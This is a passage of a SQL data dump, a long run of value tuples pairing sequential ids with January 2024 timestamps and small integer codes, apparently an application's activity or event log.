(9036, '2024-01-06 02:19:40', 1, 2054, 0, 1, 1),
(9037, '2024-01-06 03:52:18', 1, 2061, 0, 1, 1),
(9038, '2024-01-06 03:54:17', 1, 2053, 0, 1, 1),
(9039, '2024-01-06 05:18:28', 1, 2061, 0, 1, 1),
(9040, '2024-01-06 05:26:15', 1, 2063, 0, 1, 1),
(9041, '2024-01-06 10:19:57', 4, 2064, 1659, 1, 1),
(9042, '2024-01-06 11:19:24', 1, 2060, 0, 1, 1),
(9043, '2024-01-06 15:50:32', 1, 2053, 0, 1, 1),
(9044, '2024-01-06 17:19:10', 1, 2054, 0, 1, 1),
(9045, '2024-01-06 20:59:58', 1, 2054, 0, 1, 1),
(9046, '2024-01-06 21:21:51', 1, 2053, 0, 1, 1),
(9047, '2024-01-07 01:19:51', 1, 2059, 0, 1, 1),
(9048, '2024-01-07 04:50:41', 1, 2054, 0, 1, 1),
(9049, '2024-01-07 05:19:50', 1, 2053, 0, 1, 1),
(9050, '2024-01-07 07:08:59', 1, 2055, 0, 1, 1),
(9051, '2024-01-07 13:19:47', 1, 2059, 0, 1, 1),
(9052, '2024-01-07 15:59:13', 1, 2054, 0, 1, 1),
(9053, '2024-01-07 16:35:44', 1, 2053, 0, 1, 1),
(9054, '2024-01-07 20:57:37', 1, 2058, 0, 1, 1),
(9055, '2024-01-08 01:50:23', 1, 2055, 0, 1, 1),
(9056, '2024-01-08 02:08:14', 1, 2055, 0, 1, 1),
(9057, '2024-01-08 03:43:01', 1, 2053, 0, 1, 1),
(9058, '2024-01-08 04:12:51', 1, 2054, 0, 1, 1),
(9059, '2024-01-08 04:52:00', 1, 2062, 0, 1, 1),
(9060, '2024-01-08 13:46:56', 1, 2059, 0, 1, 1),
(9061, '2024-01-08 16:00:21', 1, 2053, 0, 1, 1),
(9062, '2024-01-08 16:04:27', 1, 2055, 0, 1, 1),
(9063, '2024-01-08 16:53:12', 1, 2054, 0, 1, 1),
(9064, '2024-01-08 20:01:02', 1, 2064, 0, 1, 1),
(9065, '2024-01-08 22:50:49', 1, 2060, 0, 1, 1),
(9066, '2024-01-08 22:50:54', 1, 2055, 0, 1, 1),
(9067, '2024-01-08 22:51:02', 1, 2059, 0, 1, 1),
(9068, '2024-01-08 22:51:06', 1, 2058, 0, 1, 1),
(9069, '2024-01-08 22:51:10', 1, 2054, 0, 1, 1),
(9070, '2024-01-08 22:51:14', 1, 2064, 0, 1, 1),
(9071, '2024-01-08 22:51:20', 1, 2063, 0, 1, 1),
(9072, '2024-01-08 22:51:24', 1, 2062, 0, 1, 1),
(9073, '2024-01-08 22:51:28', 1, 2061, 0, 1, 1),
(9074, '2024-01-09 06:19:53', 1, 2053, 0, 1, 1),
(9075, '2024-01-09 06:32:34', 1, 2055, 0, 1, 1),
(9076, '2024-01-09 08:07:38', 1, 2064, 0, 1, 1),
(9077, '2024-01-09 10:01:14', 1, 2059, 0, 1, 1),
(9078, '2024-01-09 10:10:39', 1, 2064, 0, 1, 1),
(9079, '2024-01-09 10:23:13', 1, 2054, 0, 1, 1),
(9080, '2024-01-09 18:26:40', 1, 2054, 0, 1, 1),
(9081, '2024-01-09 18:51:40', 1, 2055, 0, 1, 1),
(9082, '2024-01-09 23:28:45', 1, 2053, 0, 1, 1),
(9083, '2024-01-10 03:34:42', 1, 2062, 0, 1, 1),
(9084, '2024-01-10 03:42:06', 1, 2061, 0, 1, 1),
(9085, '2024-01-10 03:53:04', 1, 2061, 0, 1, 1),
(9086, '2024-01-10 06:05:07', 1, 2061, 0, 1, 1),
(9087, '2024-01-10 11:15:09', 1, 2058, 0, 1, 1),
(9088, '2024-01-10 16:51:28', 1, 2061, 0, 1, 1),
(9089, '2024-01-10 20:24:29', 1, 2053, 0, 1, 1),
(9090, '2024-01-10 21:13:37', 1, 2064, 0, 1, 1),
(9091, '2024-01-11 04:00:50', 1, 2053, 0, 1, 1),
(9092, '2024-01-11 06:53:53', 1, 2064, 0, 1, 1),
(9093, '2024-01-11 07:03:30', 1, 2061, 0, 1, 1),
(9094, '2024-01-11 08:27:32', 1, 2063, 0, 1, 1),
(9095, '2024-01-11 15:03:30', 1, 2054, 0, 1, 1),
(9096, '2024-01-11 18:06:32', 1, 2061, 0, 1, 1),
(9097, '2024-01-11 18:28:11', 1, 2059, 0, 1, 1),
(9098, '2024-01-11 18:51:55', 1, 2061, 0, 1, 1),
(9099, '2024-01-11 20:17:37', 1, 2064, 0, 1, 1),
(9100, '2024-01-12 05:13:34', 1, 2059, 0, 1, 1),
(9101, '2024-01-12 08:27:42', 1, 2061, 0, 1, 1),
(9102, '2024-01-12 08:27:46', 1, 2061, 0, 1, 1),
(9103, '2024-01-12 08:54:38', 1, 2064, 0, 1, 1),
(9104, '2024-01-12 10:45:27', 1, 2054, 0, 1, 1),
(9105, '2024-01-12 13:33:48', 1, 2064, 0, 1, 1),
(9106, '2024-01-12 13:51:30', 1, 2059, 0, 1, 1),
(9107, '2024-01-12 14:48:46', 1, 2055, 0, 1, 1),
(9108, '2024-01-12 15:33:20', 1, 2053, 0, 1, 1),
(9109, '2024-01-12 19:14:01', 1, 2063, 0, 1, 1),
(9110, '2024-01-12 19:59:51', 1, 2063, 0, 1, 1),
(9111, '2024-01-12 22:20:19', 1, 2055, 0, 1, 1),
(9112, '2024-01-12 23:08:34', 1, 2062, 0, 1, 1),
(9113, '2024-01-13 03:01:16', 1, 2055, 0, 1, 1),
(9114, '2024-01-13 05:03:09', 1, 2060, 0, 1, 1),
(9115, '2024-01-13 05:35:59', 1, 2061, 0, 1, 1),
(9116, '2024-01-13 05:36:16', 4, 2061, 1706, 1, 1),
(9117, '2024-01-13 05:36:16', 4, 2064, 1708, 1, 1),
(9118, '2024-01-13 05:36:16', 4, 2061, 1707, 1, 1),
(9119, '2024-01-13 05:36:16', 4, 2064, 1709, 1, 1),
(9120, '2024-01-13 05:36:16', 4, 2061, 1705, 1, 1),
(9121, '2024-01-13 05:40:18', 1, 2054, 0, 1, 1),
(9122, '2024-01-13 11:05:02', 1, 2058, 0, 1, 1),
(9123, '2024-01-14 04:19:18', 1, 2061, 0, 1, 1),
(9124, '2024-01-14 09:18:44', 1, 2060, 0, 1, 1),
(9125, '2024-01-14 10:57:28', 1, 2063, 0, 1, 1),
(9126, '2024-01-14 12:03:11', 1, 2053, 0, 1, 1),
(9127, '2024-01-14 12:44:17', 1, 2061, 0, 1, 1),
(9128, '2024-01-14 18:50:48', 1, 2064, 0, 1, 1),
(9129, '2024-01-14 18:50:50', 1, 2054, 0, 1, 1),
(9130, '2024-01-14 19:17:52', 1, 2059, 0, 1, 1),
(9131, '2024-01-14 20:48:36', 1, 2064, 0, 1, 1),
(9132, '2024-01-14 21:33:36', 1, 2055, 0, 1, 1),
(9133, '2024-01-14 22:48:46', 1, 2059, 0, 1, 1),
(9134, '2024-01-15 02:17:07', 1, 2061, 0, 1, 1),
(9135, '2024-01-15 02:52:59', 1, 2055, 0, 1, 1),
(9136, '2024-01-15 02:56:58', 1, 2058, 0, 1, 1),
(9137, '2024-01-15 07:38:56', 1, 2053, 0, 1, 1),
(9138, '2024-01-15 09:25:19', 1, 2061, 0, 1, 1),
(9139, '2024-01-15 09:25:42', 1, 2061, 0, 1, 1),
(9140, '2024-01-15 12:45:49', 1, 2055, 0, 1, 1),
(9141, '2024-01-15 15:41:01', 1, 2061, 0, 1, 1),
(9142, '2024-01-15 15:41:01', 1, 2060, 0, 1, 1),
(9143, '2024-01-15 15:41:01', 1, 2059, 0, 1, 1),
(9144, '2024-01-15 15:41:01', 1, 2058, 0, 1, 1),
(9145, '2024-01-15 15:41:03', 1, 2063, 0, 1, 1),
(9146, '2024-01-15 15:41:03', 1, 2064, 0, 1, 1),
(9147, '2024-01-15 15:41:04', 1, 2054, 0, 1, 1),
(9148, '2024-01-15 15:41:04', 1, 2062, 0, 1, 1),
(9149, '2024-01-15 15:41:08', 1, 2055, 0, 1, 1),
(9150, '2024-01-15 15:41:09', 1, 2059, 0, 1, 1),
(9151, '2024-01-15 15:41:09', 1, 2061, 0, 1, 1),
(9152, '2024-01-15 15:41:09', 1, 2058, 0, 1, 1),
(9153, '2024-01-15 15:41:10', 1, 2054, 0, 1, 1),
(9154, '2024-01-15 15:41:37', 1, 2064, 0, 1, 1),
(9155, '2024-01-15 15:41:37', 1, 2055, 0, 1, 1),
(9156, '2024-01-15 15:41:45', 1, 2053, 0, 1, 1),
(9157, '2024-01-15 15:41:59', 1, 2063, 0, 1, 1),
(9158, '2024-01-15 15:41:59', 1, 2062, 0, 1, 1),
(9159, '2024-01-15 15:42:00', 1, 2060, 0, 1, 1),
(9160, '2024-01-15 18:41:32', 1, 2054, 0, 1, 1),
(9161, '2024-01-15 19:44:52', 1, 2061, 0, 1, 1),
(9162, '2024-01-16 00:50:31', 1, 2063, 0, 1, 1),
(9163, '2024-01-16 01:24:05', 1, 2059, 0, 1, 1),
(9164, '2024-01-16 02:13:24', 1, 2058, 0, 1, 1),
(9165, '2024-01-16 02:37:01', 1, 2061, 0, 1, 1),
(9166, '2024-01-16 11:06:50', 1, 2058, 0, 1, 1),
(9167, '2024-01-16 13:37:45', 1, 2058, 0, 1, 1),
(9168, '2024-01-16 13:38:10', 1, 2058, 0, 1, 1),
(9169, '2024-01-16 19:53:18', 1, 2060, 0, 1, 1),
(9170, '2024-01-16 22:56:09', 1, 2062, 0, 1, 1),
(9171, '2024-01-17 00:06:18', 1, 2062, 0, 1, 1),
(9172, '2024-01-17 00:14:45', 1, 2059, 0, 1, 1),
(9173, '2024-01-17 01:42:14', 1, 2055, 0, 1, 1),
(9174, '2024-01-17 02:38:44', 1, 2053, 0, 1, 1),
(9175, '2024-01-17 06:46:19', 1, 2060, 0, 1, 1),
(9176, '2024-01-17 06:57:36', 1, 2063, 0, 1, 1),
(9177, '2024-01-17 07:26:07', 1, 2058, 0, 1, 1),
(9178, '2024-01-17 08:22:46', 1, 2055, 0, 1, 1),
(9179, '2024-01-17 09:53:37', 1, 2061, 0, 1, 1),
(9180, '2024-01-17 10:17:56', 1, 2063, 0, 1, 1),
(9181, '2024-01-17 10:17:59', 1, 2062, 0, 1, 1),
(9182, '2024-01-17 10:18:01', 1, 2060, 0, 1, 1),
(9183, '2024-01-17 10:18:04', 1, 2059, 0, 1, 1),
(9184, '2024-01-17 10:40:24', 1, 2061, 0, 1, 1),
(9185, '2024-01-17 10:41:22', 1, 2062, 0, 1, 1),
(9186, '2024-01-17 11:28:02', 1, 2064, 0, 1, 1),
(9187, '2024-01-17 11:54:26', 1, 2059, 0, 1, 1),
(9188, '2024-01-17 11:54:56', 1, 2063, 0, 1, 1),
(9189, '2024-01-17 12:12:38', 1, 2054, 0, 1, 1),
(9190, '2024-01-17 12:33:30', 1, 2059, 0, 1, 1),
(9191, '2024-01-17 12:50:31', 1, 2064, 0, 1, 1),
(9192, '2024-01-17 16:51:54', 1, 2060, 0, 1, 1),
(9193, '2024-01-17 17:07:43', 1, 2063, 0, 1, 1),
(9194, '2024-01-17 17:49:22', 1, 2060, 0, 1, 1),
(9195, '2024-01-17 18:00:18', 1, 2063, 0, 1, 1),
(9196, '2024-01-17 18:29:31', 1, 2058, 0, 1, 1),
(9197, '2024-01-17 19:25:30', 1, 2055, 0, 1, 1),
(9198, '2024-01-17 20:36:54', 1, 2059, 0, 1, 1),
(9199, '2024-01-17 20:45:49', 1, 2059, 0, 1, 1),
(9200, '2024-01-17 20:57:43', 1, 2061, 0, 1, 1),
(9201, '2024-01-17 21:37:55', 1, 2054, 0, 1, 1),
(9202, '2024-01-17 21:46:16', 1, 2062, 0, 1, 1),
(9203, '2024-01-17 21:49:43', 1, 2059, 0, 1, 1),
(9204, '2024-01-17 22:53:16', 1, 2054, 0, 1, 1),
(9205, '2024-01-17 23:10:00', 1, 2060, 0, 1, 1),
(9206, '2024-01-17 23:21:11', 1, 2063, 0, 1, 1),
(9207, '2024-01-17 23:50:30', 1, 2058, 0, 1, 1),
(9208, '2024-01-18 00:47:42', 1, 2055, 0, 1, 1),
(9209, '2024-01-18 01:33:35', 1, 2060, 0, 1, 1),
(9210, '2024-01-18 01:44:31', 1, 2063, 0, 1, 1),
(9211, '2024-01-18 02:13:00', 1, 2058, 0, 1, 1),
(9212, '2024-01-18 03:08:36', 1, 2055, 0, 1, 1),
(9213, '2024-01-18 03:50:53', 1, 2060, 0, 1, 1),
(9214, '2024-01-18 04:02:44', 1, 2063, 0, 1, 1),
(9215, '2024-01-18 04:51:58', 1, 2060, 0, 1, 1),
(9216, '2024-01-18 05:07:50', 1, 2063, 0, 1, 1),
(9217, '2024-01-18 05:50:38', 1, 2058, 0, 1, 1),
(9218, '2024-01-18 07:14:14', 1, 2055, 0, 1, 1),
(9219, '2024-01-18 08:45:24', 1, 2064, 0, 1, 1),
(9220, '2024-01-18 08:55:55', 1, 2059, 0, 1, 1),
(9221, '2024-01-18 09:30:48', 1, 2061, 0, 1, 1),
(9222, '2024-01-18 09:52:11', 1, 2054, 0, 1, 1),
(9223, '2024-01-18 10:43:15', 1, 2062, 0, 1, 1),
(9224, '2024-01-18 10:45:38', 1, 2054, 0, 1, 1),
(9225, '2024-01-18 12:54:01', 1, 2064, 0, 1, 1),
(9226, '2024-01-18 13:04:40', 1, 2054, 0, 1, 1),
(9227, '2024-01-18 13:35:46', 1, 2059, 0, 1, 1),
(9228, '2024-01-18 14:01:06', 1, 2064, 0, 1, 1),
(9229, '2024-01-18 15:56:28', 1, 2060, 0, 1, 1),
(9230, '2024-01-18 16:08:19', 1, 2063, 0, 1, 1),
(9231, '2024-01-18 16:38:11', 1, 2058, 0, 1, 1),
(9232, '2024-01-18 17:37:33', 1, 2055, 0, 1, 1),
(9233, '2024-01-18 19:12:15', 1, 2061, 0, 1, 1),
(9234, '2024-01-18 20:02:10', 1, 2062, 0, 1, 1),
(9235, '2024-01-18 21:40:27', 1, 2054, 0, 1, 1),
(9236, '2024-01-18 22:03:08', 1, 2059, 0, 1, 1),
(9237, '2024-01-18 22:20:44', 1, 2064, 0, 1, 1),
(9238, '2024-01-18 23:04:28', 1, 2060, 0, 1, 1),
(9239, '2024-01-18 23:47:03', 1, 2060, 0, 1, 1),
(9240, '2024-01-18 23:58:49', 1, 2063, 0, 1, 1),
(9241, '2024-01-19 00:29:15', 1, 2058, 0, 1, 1),
(9242, '2024-01-19 00:59:34', 1, 2059, 0, 1, 1),
(9243, '2024-01-19 01:27:48', 1, 2055, 0, 1, 1),
(9244, '2024-01-19 03:01:24', 1, 2061, 0, 1, 1),
(9245, '2024-01-19 03:15:44', 1, 2058, 0, 1, 1),
(9246, '2024-01-19 03:51:55', 1, 2062, 0, 1, 1),
(9247, '2024-01-19 04:59:57', 1, 2060, 0, 1, 1),
(9248, '2024-01-19 05:11:40', 1, 2063, 0, 1, 1),
(9249, '2024-01-19 05:41:09', 1, 2058, 0, 1, 1),
(9250, '2024-01-19 06:38:59', 1, 2055, 0, 1, 1),
(9251, '2024-01-19 08:09:23', 1, 2061, 0, 1, 1),
(9252, '2024-01-19 08:13:40', 1, 2061, 0, 1, 1),
(9253, '2024-01-19 08:29:01', 1, 2055, 0, 1, 1),
(9254, '2024-01-19 09:04:56', 1, 2062, 0, 1, 1),
(9255, '2024-01-19 09:06:24', 1, 2053, 0, 1, 1),
(9256, '2024-01-19 10:44:40', 1, 2054, 0, 1, 1),
(9257, '2024-01-19 11:08:00', 1, 2059, 0, 1, 1),
(9258, '2024-01-19 11:10:52', 1, 2058, 0, 1, 1),
(9259, '2024-01-19 11:11:13', 1, 2058, 0, 1, 1),
(9260, '2024-01-19 11:26:21', 1, 2064, 0, 1, 1),
(9261, '2024-01-19 12:01:02', 1, 2054, 0, 1, 1),
(9262, '2024-01-19 12:10:33', 1, 2064, 0, 1, 1),
(9263, '2024-01-19 12:34:36', 1, 2064, 0, 1, 1),
(9264, '2024-01-19 14:02:11', 1, 2058, 0, 1, 1),
(9265, '2024-01-19 15:07:02', 1, 2054, 0, 1, 1),
(9266, '2024-01-19 17:56:51', 1, 2059, 0, 1, 1),
(9267, '2024-01-19 18:11:07', 1, 2059, 0, 1, 1),
(9268, '2024-01-19 20:56:06', 1, 2061, 0, 1, 1),
(9269, '2024-01-19 21:43:00', 1, 2053, 0, 1, 1),
(9270, '2024-01-20 01:08:09', 1, 2059, 0, 1, 1),
(9271, '2024-01-20 01:40:13', 1, 2055, 0, 1, 1),
(9272, '2024-01-20 01:55:05', 1, 2060, 0, 1, 1),
(9273, '2024-01-20 01:55:19', 1, 2061, 0, 1, 1),
(9274, '2024-01-20 04:18:59', 1, 2063, 0, 1, 1),
(9275, '2024-01-20 04:39:38', 1, 2055, 0, 1, 1),
(9276, '2024-01-20 06:00:04', 1, 2064, 0, 1, 1),
(9277, '2024-01-20 06:15:55', 1, 2054, 0, 1, 1),
(9278, '2024-01-20 07:21:20', 1, 2062, 0, 1, 1),
(9279, '2024-01-20 08:05:09', 1, 2064, 0, 1, 1),
(9280, '2024-01-20 08:30:09', 1, 2062, 0, 1, 1),
(9281, '2024-01-20 08:32:14', 1, 2059, 0, 1, 1),
(9282, '2024-01-20 10:16:39', 1, 2059, 0, 1, 1),
(9283, '2024-01-20 10:38:56', 1, 2063, 0, 1, 1),
(9284, '2024-01-20 11:17:47', 1, 2059, 0, 1, 1),
(9285, '2024-01-20 11:32:58', 1, 2053, 0, 1, 1),
(9286, '2024-01-20 13:09:06', 1, 2060, 0, 1, 1),
(9287, '2024-01-20 17:07:28', 1, 2054, 0, 1, 1),
(9288, '2024-01-20 17:57:17', 1, 2064, 0, 1, 1),
(9289, '2024-01-20 18:57:00', 1, 2060, 0, 1, 1),
(9290, '2024-01-20 19:25:23', 1, 2053, 0, 1, 1),
(9291, '2024-01-20 20:20:58', 1, 2063, 0, 1, 1),
(9292, '2024-01-21 02:07:44', 1, 2055, 0, 1, 1),
(9293, '2024-01-21 02:11:39', 1, 2054, 0, 1, 1),
(9294, '2024-01-21 02:58:46', 1, 2063, 0, 1, 1),
(9295, '2024-01-21 04:30:02', 1, 2058, 0, 1, 1),
(9296, '2024-01-21 05:38:23', 1, 2063, 0, 1, 1),
(9297, '2024-01-21 06:25:42', 1, 2054, 0, 1, 1),
(9298, '2024-01-21 06:40:53', 1, 2064, 0, 1, 1),
(9299, '2024-01-21 07:25:30', 1, 2053, 0, 1, 1),
(9300, '2024-01-21 15:35:38', 1, 2055, 0, 1, 1),
(9301, '2024-01-21 15:42:23', 1, 2064, 0, 1, 1),
(9302, '2024-01-21 16:04:12', 1, 2063, 0, 1, 1),
(9303, '2024-01-21 17:03:57', 1, 2053, 0, 1, 1),
(9304, '2024-01-21 23:32:10', 1, 2061, 0, 1, 1),
(9305, '2024-01-21 23:32:10', 1, 2059, 0, 1, 1),
(9306, '2024-01-21 23:32:10', 1, 2060, 0, 1, 1),
(9307, '2024-01-21 23:32:10', 1, 2058, 0, 1, 1),
(9308, '2024-01-21 23:32:16', 1, 2054, 0, 1, 1),
(9309, '2024-01-21 23:32:16', 1, 2055, 0, 1, 1),
(9310, '2024-01-21 23:32:26', 1, 2064, 0, 1, 1),
(9311, '2024-01-21 23:32:28', 1, 2063, 0, 1, 1),
(9312, '2024-01-21 23:32:31', 1, 2062, 0, 1, 1),
(9313, '2024-01-22 00:46:32', 1, 2064, 0, 1, 1),
(9314, '2024-01-22 03:25:47', 1, 2063, 0, 1, 1),
(9315, '2024-01-22 04:22:01', 1, 2063, 0, 1, 1),
(9316, '2024-01-22 04:58:10', 1, 2060, 0, 1, 1),
(9317, '2024-01-22 05:36:19', 1, 2061, 0, 1, 1),
(9318, '2024-01-22 05:50:16', 1, 2064, 0, 1, 1),
(9319, '2024-01-22 05:50:18', 1, 2053, 0, 1, 1),
(9320, '2024-01-22 06:30:44', 1, 2063, 0, 1, 1),
(9321, '2024-01-22 07:48:49', 1, 2053, 0, 1, 1),
(9322, '2024-01-22 08:44:49', 1, 2054, 0, 1, 1),
(9323, '2024-01-22 09:08:36', 1, 2059, 0, 1, 1),
(9324, '2024-01-22 09:08:38', 1, 2059, 0, 1, 1),
(9325, '2024-01-22 09:10:40', 1, 2059, 1767, 1, 1),
(9326, '2024-01-22 13:14:36', 1, 2062, 0, 1, 1),
(9327, '2024-01-22 15:25:23', 1, 2064, 0, 1, 1),
(9328, '2024-01-22 15:25:32', 1, 2053, 0, 1, 1),
(9329, '2024-01-22 15:25:55', 1, 2062, 0, 1, 1),
(9330, '2024-01-22 15:51:27', 1, 2063, 0, 1, 1),
(9331, '2024-01-22 16:10:56', 1, 2059, 0, 1, 1),
(9332, '2024-01-22 17:51:20', 1, 2063, 0, 1, 1),
(9333, '2024-01-22 18:17:49', 1, 2055, 0, 1, 1),
(9334, '2024-01-22 19:09:17', 1, 2060, 0, 1, 1),
(9335, '2024-01-22 19:41:34', 1, 2054, 0, 1, 1),
(9336, '2024-01-22 20:58:23', 1, 2061, 0, 1, 1),
(9337, '2024-01-23 01:19:08', 1, 2062, 0, 1, 1),
(9338, '2024-01-23 02:02:23', 1, 2063, 0, 1, 1),
(9339, '2024-01-23 04:31:33', 1, 2063, 0, 1, 1),
(9340, '2024-01-23 05:17:37', 1, 2064, 0, 1, 1),
(9341, '2024-01-23 05:32:10', 1, 2054, 0, 1, 1),
(9342, '2024-01-23 06:58:35', 1, 2053, 0, 1, 1),
(9343, '2024-01-23 06:58:38', 1, 2064, 0, 1, 1),
(9344, '2024-01-23 07:56:26', 1, 2064, 0, 1, 1),
(9345, '2024-01-23 12:31:40', 1, 2061, 0, 1, 1),
(9346, '2024-01-23 12:56:41', 1, 2061, 0, 1, 1),
(9347, '2024-01-23 15:03:50', 1, 2054, 0, 1, 1),
(9348, '2024-01-23 15:53:38', 1, 2061, 0, 1, 1),
(9349, '2024-01-23 19:16:54', 1, 2064, 0, 1, 1),
(9350, '2024-01-23 20:26:39', 1, 2053, 0, 1, 1),
(9351, '2024-01-23 23:48:12', 1, 2062, 0, 1, 1),
(9352, '2024-01-24 01:27:03', 1, 2054, 0, 1, 1),
(9353, '2024-01-24 05:45:42', 1, 2061, 0, 1, 1),
(9354, '2024-01-24 06:22:13', 1, 2054, 0, 1, 1),
(9355, '2024-01-24 07:52:57', 1, 2058, 0, 1, 1),
(9356, '2024-01-24 07:52:59', 1, 2061, 0, 1, 1),
(9357, '2024-01-24 07:53:00', 1, 2059, 0, 1, 1),
(9358, '2024-01-24 07:53:02', 1, 2060, 0, 1, 1),
(9359, '2024-01-24 07:53:03', 1, 2062, 0, 1, 1),
(9360, '2024-01-24 07:53:07', 1, 2063, 0, 1, 1),
(9361, '2024-01-24 07:53:10', 1, 2064, 0, 1, 1),
(9362, '2024-01-24 07:53:18', 1, 2055, 0, 1, 1),
(9363, '2024-01-24 07:53:20', 1, 2054, 0, 1, 1),
(9364, '2024-01-24 09:41:33', 1, 2063, 0, 1, 1),
(9365, '2024-01-24 12:15:09', 1, 2054, 0, 1, 1),
(9366, '2024-01-24 16:29:39', 1, 2053, 0, 1, 1),
(9367, '2024-01-24 16:38:42', 1, 2063, 0, 1, 1),
(9368, '2024-01-24 16:38:43', 1, 2063, 0, 1, 1),
(9369, '2024-01-24 16:52:19', 1, 2058, 0, 1, 1),
(9370, '2024-01-24 18:54:50', 1, 2062, 0, 1, 1),
(9371, '2024-01-24 19:08:09', 1, 2054, 0, 1, 1),
(9372, '2024-01-24 21:42:27', 1, 2061, 0, 1, 1),
(9373, '2024-01-24 22:54:20', 1, 2062, 0, 1, 1),
(9374, '2024-01-24 22:58:01', 1, 2060, 0, 1, 1),
(9375, '2024-01-25 00:22:31', 1, 2061, 0, 1, 1),
(9376, '2024-01-25 00:46:43', 1, 2054, 0, 1, 1),
(9377, '2024-01-25 00:46:44', 1, 2055, 0, 1, 1),
(9378, '2024-01-25 00:46:50', 1, 2064, 0, 1, 1),
(9379, '2024-01-25 00:46:53', 1, 2063, 0, 1, 1),
(9380, '2024-01-25 00:46:56', 1, 2062, 0, 1, 1),
(9381, '2024-01-25 00:46:57', 1, 2060, 0, 1, 1),
(9382, '2024-01-25 00:46:58', 1, 2059, 0, 1, 1),
(9383, '2024-01-25 00:47:00', 1, 2061, 0, 1, 1),
(9384, '2024-01-25 00:47:01', 1, 2058, 0, 1, 1),
(9385, '2024-01-25 01:04:35', 1, 2055, 0, 1, 1),
(9386, '2024-01-25 02:08:38', 1, 2060, 0, 1, 1),
(9387, '2024-01-25 04:32:44', 1, 2059, 0, 1, 1),
(9388, '2024-01-25 05:11:15', 1, 2054, 0, 1, 1),
(9389, '2024-01-25 10:01:41', 1, 2064, 0, 1, 1),
(9390, '2024-01-25 11:48:48', 1, 2054, 0, 1, 1),
(9391, '2024-01-25 11:57:24', 1, 2053, 0, 1, 1),
(9392, '2024-01-25 16:10:04', 1, 2061, 0, 1, 1),
(9393, '2024-01-25 16:10:05', 1, 2061, 0, 1, 1),
(9394, '2024-01-25 16:10:06', 1, 2061, 0, 1, 1),
(9395, '2024-01-25 16:10:11', 1, 2061, 0, 1, 1),
(9396, '2024-01-25 16:54:29', 1, 2053, 0, 1, 1),
(9397, '2024-01-25 19:18:11', 1, 2060, 0, 1, 1),
(9398, '2024-01-25 19:40:51', 1, 2054, 0, 1, 1),
(9399, '2024-01-25 20:56:40', 1, 2053, 0, 1, 1),
(9400, '2024-01-25 21:37:25', 1, 2061, 0, 1, 1),
(9401, '2024-01-25 21:37:25', 1, 2061, 0, 1, 1),
(9402, '2024-01-26 00:01:55', 1, 2059, 0, 1, 1),
(9403, '2024-01-26 00:30:09', 1, 2060, 0, 1, 1),
(9404, '2024-01-26 00:53:42', 1, 2058, 0, 1, 1),
(9405, '2024-01-26 00:58:07', 1, 2061, 0, 1, 1),
(9406, '2024-01-26 00:59:00', 1, 2055, 0, 1, 1),
(9407, '2024-01-26 03:17:45', 1, 2064, 0, 1, 1),
(9408, '2024-01-26 03:18:10', 1, 2059, 0, 1, 1),
(9409, '2024-01-26 05:00:08', 1, 2063, 0, 1, 1),
(9410, '2024-01-26 05:48:02', 1, 2054, 0, 1, 1),
(9411, '2024-01-26 06:59:00', 1, 2054, 0, 1, 1),
(9412, '2024-01-26 08:01:51', 1, 2054, 0, 1, 1),
(9413, '2024-01-26 08:18:00', 1, 2062, 0, 1, 1),
(9414, '2024-01-26 09:08:08', 1, 2064, 0, 1, 1),
(9415, '2024-01-26 11:32:48', 1, 2053, 0, 1, 1),
(9416, '2024-01-26 11:55:57', 1, 2064, 0, 1, 1),
(9417, '2024-01-26 12:00:45', 1, 2054, 0, 1, 1),
(9418, '2024-01-26 12:58:23', 1, 2064, 0, 1, 1),
(9419, '2024-01-26 17:14:09', 1, 2063, 0, 1, 1),
(9420, '2024-01-26 17:14:41', 1, 2061, 0, 1, 1),
(9421, '2024-01-26 17:16:10', 1, 2055, 0, 1, 1),
(9422, '2024-01-26 17:50:22', 1, 2054, 0, 1, 1),
(9423, '2024-01-26 17:58:11', 1, 2058, 0, 1, 1),
(9424, '2024-01-26 21:01:05', 1, 2053, 0, 1, 1),
(9425, '2024-01-27 01:47:52', 1, 2064, 0, 1, 1),
(9426, '2024-01-27 02:42:29', 1, 2061, 0, 1, 1),
(9427, '2024-01-27 04:20:15', 1, 2055, 0, 1, 1),
(9428, '2024-01-27 07:01:36', 1, 2061, 0, 1, 1),
(9429, '2024-01-27 08:41:23', 1, 2058, 0, 1, 1),
(9430, '2024-01-27 09:00:58', 1, 2064, 0, 1, 1),
(9431, '2024-01-27 09:46:36', 1, 2063, 0, 1, 1),
(9432, '2024-01-27 14:15:13', 1, 2060, 0, 1, 1),
(9433, '2024-01-27 14:24:10', 1, 2063, 0, 1, 1),
(9434, '2024-01-27 14:46:34', 1, 2058, 0, 1, 1),
(9435, '2024-01-27 15:15:23', 1, 2059, 0, 1, 1),
(9436, '2024-01-27 15:32:37', 1, 2055, 0, 1, 1),
(9437, '2024-01-27 16:55:36', 1, 2061, 0, 1, 1),
(9438, '2024-01-27 17:28:53', 1, 2062, 0, 1, 1),
(9439, '2024-01-27 17:28:55', 1, 2062, 0, 1, 1),
(9440, '2024-01-27 17:31:23', 1, 2064, 0, 1, 1),
(9441, '2024-01-27 17:39:03', 1, 2062, 0, 1, 1),
(9442, '2024-01-27 19:05:37', 1, 2054, 0, 1, 1),
(9443, '2024-01-27 19:24:41', 1, 2059, 0, 1, 1),
(9444, '2024-01-27 19:39:09', 1, 2064, 0, 1, 1),
(9445, '2024-01-27 22:14:30', 1, 2060, 0, 1, 1),
(9446, '2024-01-27 22:23:04', 1, 2063, 0, 1, 1),
(9447, '2024-01-27 23:01:14', 1, 2060, 0, 1, 1),
(9448, '2024-01-27 23:10:01', 1, 2063, 0, 1, 1),
(9449, '2024-01-27 23:56:27', 1, 2060, 0, 1, 1),
(9450, '2024-01-28 00:22:49', 1, 2060, 0, 1, 1),
(9451, '2024-01-28 00:31:00', 1, 2063, 0, 1, 1),
(9452, '2024-01-28 00:52:03', 1, 2058, 0, 1, 1),
(9453, '2024-01-28 01:35:17', 1, 2055, 0, 1, 1),
(9454, '2024-01-28 01:53:31', 1, 2064, 0, 1, 1),
(9455, '2024-01-28 02:01:02', 1, 2064, 0, 1, 1),
(9456, '2024-01-28 02:36:44', 1, 2063, 0, 1, 1),
(9457, '2024-01-28 02:39:14', 1, 2055, 0, 1, 1),
(9458, '2024-01-28 02:55:11', 1, 2061, 0, 1, 1),
(9459, '2024-01-28 03:18:21', 1, 2059, 0, 1, 1),
(9460, '2024-01-28 03:21:15', 1, 2054, 0, 1, 1),
(9461, '2024-01-28 03:36:30', 1, 2062, 0, 1, 1),
(9462, '2024-01-28 04:38:32', 1, 2060, 0, 1, 1),
(9463, '2024-01-28 04:38:34', 1, 2063, 0, 1, 1),
